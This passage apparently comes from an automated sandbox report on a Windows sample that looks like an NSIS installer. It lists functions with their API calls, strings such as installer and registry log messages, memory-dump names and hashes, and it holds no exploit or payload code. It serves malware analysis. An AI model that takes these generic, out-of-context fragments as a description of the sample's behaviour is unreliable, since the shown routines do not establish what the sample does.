                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                • API String ID: 1641139501-220328614
                                                • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3734993849-3206598305
                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                Strings
                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID: created uninstaller: %d, "%s"
                                                • API String ID: 3294113728-3145124454
                                                • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427576,762323A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                Strings
                                                • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                • `G, xrefs: 0040246E
                                                • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                • API String ID: 1033533793-4193110038
                                                • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                • GetSysColor.USER32(?), ref: 00403E57
                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427576,762323A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                Strings
                                                • Exec: command="%s", xrefs: 00402241
                                                • Exec: success ("%s"), xrefs: 00402263
                                                • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                • API String ID: 2014279497-3433828417
                                                • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                • GetMessagePos.USER32 ref: 0040489D
                                                • ScreenToClient.USER32(?,?), ref: 004048B5
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                • MulDiv.KERNEL32(0004BC00,00000064,0013C06D), ref: 00403295
                                                • wsprintfW.USER32 ref: 004032A5
                                                • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                Strings
                                                • verifying installer: %d%%, xrefs: 0040329F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: verifying installer: %d%%
                                                • API String ID: 1451636040-82062127
                                                • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                Download Yara Rule
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":
                                                • API String ID: 589700163-165019052
                                                • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
